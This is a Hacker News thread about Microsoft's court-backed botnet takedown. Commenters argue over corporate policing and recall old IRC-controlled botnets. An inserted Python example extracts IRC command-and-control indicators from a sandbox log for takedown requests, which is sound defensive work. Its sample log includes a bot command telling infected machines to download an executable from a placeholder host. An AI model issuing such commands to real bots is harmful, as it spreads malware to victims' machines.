
A botnet is taken down in an operation by Microsoft, not the government - wglb
https://www.nytimes.com/2020/03/10/us/politics/microsoft-botnets-malware.html
======
ipython
I'm glad this is getting coverage, but this is nothing new to Microsoft-
they've been doing this for almost a decade (see for example
[https://www.zeuslegalnotice.com/](https://www.zeuslegalnotice.com/)). DCU has
a great reputation and they're doing great work ( _in conjunction with_ law
enforcement and legal authorities) to make life better for all of us on the
Internet.

------
INTPenis
"Not the government" ooooh. As if AV vendors have been completely idle on that
front.

I just find this article very fitting as Microsoft is right now running an ad
campaign on reddit for their security services.

------
neonate
[https://archive.md/Mbiy0](https://archive.md/Mbiy0)

------
Frost1x
I remember when some of the earlier botnets I was exposed to used IRC networks
and private/hidden channels to provide command/control interfaces to the
bots/zombies/clients. In a lot of cases, the control mechanism had no
redundancy (set to one specific network and/or server and channel).

People passed around lots of executables during those days (naively trusting
sources/friends) which usually had additional side-loading mechanisms for the
bot (sometimes from an HTTP request, sometimes FTP).

Used to grab these modified executables for plugins/game extensions/etc.,
sandbox them, identify the control IRC networks, channels and passwords, and
have the networks shut down the channels, which essentially killed the botnet
from further use.

I imagine most of the clients are far more resilient and sophisticated these
days. I think the largest botnet I identified and 'shut down' (obviously with
help from IRC network admins) had around a million clients on separate
networks.

Most of these were pushed on smaller relatively unknown/unpopular IRC networks
where the admins somehow didn't notice tens of thousands of clients sitting
idle on their network.

It was always a bit enjoyable to pop into one of the private, password-protected
control channels and start a conversation, catching someone completely off
guard who didn't expect anyone to find their little control interface. I
imagine most of these were built off a known library which wasn't too
sophisticated. Most people were humorously surprised.
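
The workflow described above (run the sample in a sandbox, pull the IRC server, channel and password out of its traffic, then hand those to the network admins) as an added example; this is not the commenter's code or any real tool. It parses a constructed sandbox network log (the addresses, nick, password and channel are invented for the example) and also flags the single-server, no-redundancy C2 the comment mentions:

```python
"""Extract IRC command-and-control indicators from a sandbox network log.

Added example, not from the original post. The log format ("src:port -> dst:port | payload")
and every value in SAMPLE_LOG are constructed for this illustration.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed sandbox capture: one IRC line per entry, client is 10.0.0.5.
SAMPLE_LOG = """\
10.0.0.5:49152 -> 198.51.100.23:6667 | PASS s3cretpass
10.0.0.5:49152 -> 198.51.100.23:6667 | NICK [USA|XP]12345
10.0.0.5:49152 -> 198.51.100.23:6667 | USER bot 0 * :bot
198.51.100.23:6667 -> 10.0.0.5:49152 | :irc.example.net 001 [USA|XP]12345 :Welcome
10.0.0.5:49152 -> 198.51.100.23:6667 | JOIN #ctrl-x9 joinkey77
198.51.100.23:6667 -> 10.0.0.5:49152 | :[USA|XP]12345!bot@10.0.0.5 JOIN :#ctrl-x9
198.51.100.23:6667 -> 10.0.0.5:49152 | :herder!op@203.0.113.9 PRIVMSG #ctrl-x9 :.download http://203.0.113.9/upd.exe
"""

LINE_RE = re.compile(
    r"^(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) \| (?P<payload>.*)$"
)


@dataclass
class IrcC2Indicators:
    servers: Set[Tuple[str, int]] = field(default_factory=set)  # C2 endpoints the bot dialed
    password: Optional[str] = None                               # PASS sent at connect time
    nick: Optional[str] = None                                   # bot's NICK (often encodes country/OS)
    channels: Dict[str, Optional[str]] = field(default_factory=dict)  # channel -> join key
    commands: List[Tuple[str, str, str]] = field(default_factory=list)  # (sender, channel, text)


def parse_sandbox_log(text: str, client_ip: str) -> IrcC2Indicators:
    """Walk the capture once; client->server lines give credentials, server->client lines give commands."""
    ind = IrcC2Indicators()
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        payload = m["payload"].strip()
        if m["src"] == client_ip:
            ind.servers.add((m["dst"], int(m["dport"])))
            parts = payload.split(" ")
            cmd = parts[0].upper()
            if cmd == "PASS" and len(parts) > 1:
                ind.password = parts[1]
            elif cmd == "NICK" and len(parts) > 1:
                ind.nick = parts[1]
            elif cmd == "JOIN" and len(parts) > 1:
                # RFC 1459 allows "JOIN #a,#b key1,key2"; keys pair positionally.
                chans = parts[1].split(",")
                keys = parts[2].split(",") if len(parts) > 2 else []
                for i, ch in enumerate(chans):
                    ind.channels[ch] = keys[i] if i < len(keys) else None
        else:
            # Server->client: optional ":prefix " then "PRIVMSG <target> :<text>".
            prefix: Optional[str] = None
            rest = payload
            if payload.startswith(":"):
                prefix, _, rest = payload[1:].partition(" ")
            parts = rest.split(" ", 2)
            if len(parts) == 3 and parts[0].upper() == "PRIVMSG" and parts[1] in ind.channels:
                msg = parts[2][1:] if parts[2].startswith(":") else parts[2]
                sender = prefix.split("!")[0] if prefix else "?"
                ind.commands.append((sender, parts[1], msg))
    return ind


def takedown_request(ind: IrcC2Indicators) -> dict:
    """What to hand the IRC network admins, plus whether the C2 has any fallback."""
    return {
        "servers": sorted(ind.servers),
        "channels": dict(ind.channels),
        "password": ind.password,
        "single_point_of_failure": len(ind.servers) == 1,  # one server/channel: killing it kills the botnet
    }


if __name__ == "__main__":
    found = parse_sandbox_log(SAMPLE_LOG, "10.0.0.5")
    print(takedown_request(found))
    for sender, chan, text in found.commands:
        print(f"command in {chan} from {sender}: {text}")
```

Run it against a real sandbox's text export after adapting `LINE_RE` to that tool's line format; the IRC parsing itself is standard client protocol and does not depend on the sandbox.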

------
ComputerGuru
This is the norm for Microsoft... it's the exception when governments lend
their help.

------
degenerate
The article was devoid of any technical details... what exactly were they
doing to "take down" the domains? Were the domains hosted on Azure? Were they
given permission by ICANN to modify the DNS? I want details!

~~~
bskap
I don't know about this one specifically, but in the past, they've taken
advantage of the fact that a lot of these scams claim to be Windows tech
support and the like. With a creative application of US trademark laws, which
allow manufacturers to seize counterfeit goods, they got a court order
allowing them to seize the domains and computers hosting the "counterfeit"
Microsoft websites.

------
scohesc
Makes sense that a company that provides an operating system for billions of
devices around the world takes some responsibility for any criminal actions
taken by others who use said operating system's potential exploits/bugs to
harm others financially/personally/etc... Really cool to see an article written
about it though. Makes you think that Microsoft are the good guys :P

~~~
badrabbit
Regardless of size, companies are not law enforcers. MS is also not responsible
for the OS it has already sold to customers; that OS is not their property or
concern outside of patches (fixing what they broke before sales).

I hate this idea of corporate heroes; next thing they'll let them do offensive
operations (hack the hackers without any due process or authority).

~~~
jascii
Technically MS _does_ own the OS; the end user is just granted a license to
_use_ it. They do not, however, own the hardware it runs on, so there _should_
be limits on what they can do. I agree that the idea that they can act as law
enforcement without limits is chilling.

~~~
tomlogic
There are limits. The article describes them waiting on a federal court order
giving them authority to execute their plan.

~~~
kova12
I also understand that they control what amounts to a substantial private
police force. Which is exactly what government must do, not Microsoft

------
tus88
Haven't they been doing this for years?

------
ChrisArchitect
eight years in the making? six million domain names? (how does one even
address/disable/send requests to registrars for that many?) Big operation on
both ends. Yikes.

------
drcongo
The present tense of the headline is so weird. Is this an NYT thing?

~~~
statictype
I love that style of writing. Neal Stephenson used it in his earlier work to
great effect.

------
ptah
Why is this surprising? Because they are cleaning up a mess of their own
making instead of making taxpayers foot the bill?

~~~
IntelMiner
Exactly how is this Microsoft's fault?

~~~
ptah
They produce software that is vulnerable to exploitation by criminals.

~~~
IntelMiner
Human beings write code that is imperfect because people are human beings

I don't think it's particularly fair to make it out like Microsoft
intentionally writes vulnerable software

~~~
ptah
I'm not saying they do it intentionally. I am saying that they should deal
with the consequences and not let taxpayers take the downside while they take
the upside.

~~~
parheric
Funny... so about those 1 billion Android devices that are no longer offered
security updates.

I guess Google should be taking responsibility there as well?

~~~
ptah
Yes, exactly! You get it.

